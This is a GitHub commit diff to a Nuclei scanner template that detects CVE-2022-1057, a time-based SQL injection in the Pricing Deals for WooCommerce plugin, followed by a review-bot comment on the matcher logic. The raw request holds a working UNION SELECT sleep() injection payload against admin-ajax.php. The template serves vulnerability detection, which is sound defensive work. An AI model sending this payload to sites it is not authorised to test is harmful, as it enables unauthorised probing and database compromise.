Update CVE-2022-1057.yaml

patch-1
Ritik Chaddha 2022-10-23 10:08:40 +05:30 committed by GitHub
parent af7f60c205
commit 6995314028
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 6 deletions


@ -1,7 +1,7 @@
id: CVE-2022-1057
info:
name: Pricing Deals for WooCommerce < 2.0.3 - Unauthenticated SQLi
name: Pricing Deals for WooCommerce < 2.0.3 - Unauthenticated SQL Injection
author: theamanrawat
severity: critical
description: |
@ -14,18 +14,19 @@ info:
cve-id: CVE-2022-1057
metadata:
verified: true
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,pricing-deals-for-woocommerce,uauth
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,pricing-deals-for-woocommerce,unauth
requests:
- raw:
- |
@timeout: 15s
GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(5),3--+- HTTP/1.1
GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code == 500'
- 'duration>=6'
- 'status_code == 500'
- 'contains(body, "been a critical error")'
condition: and
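Review bot: The `duration>=6` matcher is silently coupled to the `sleep(6)` value in the request line, and nothing in the template records that; this commit had to change both in step. A comment above the dsl list, for example `# duration threshold must equal the sleep() value in the raw request`, would stop the two from drifting apart in a later edit. The timing check is also the only evidence that the delay came from the database. A host that takes six seconds or more to return WordPress's generic "critical error" 500 page for an unrelated reason would presumably match as well, so a hit should be confirmed before it is reported at `critical` severity. With a single matcher, `matchers-condition: and` has nothing to combine and could be dropped.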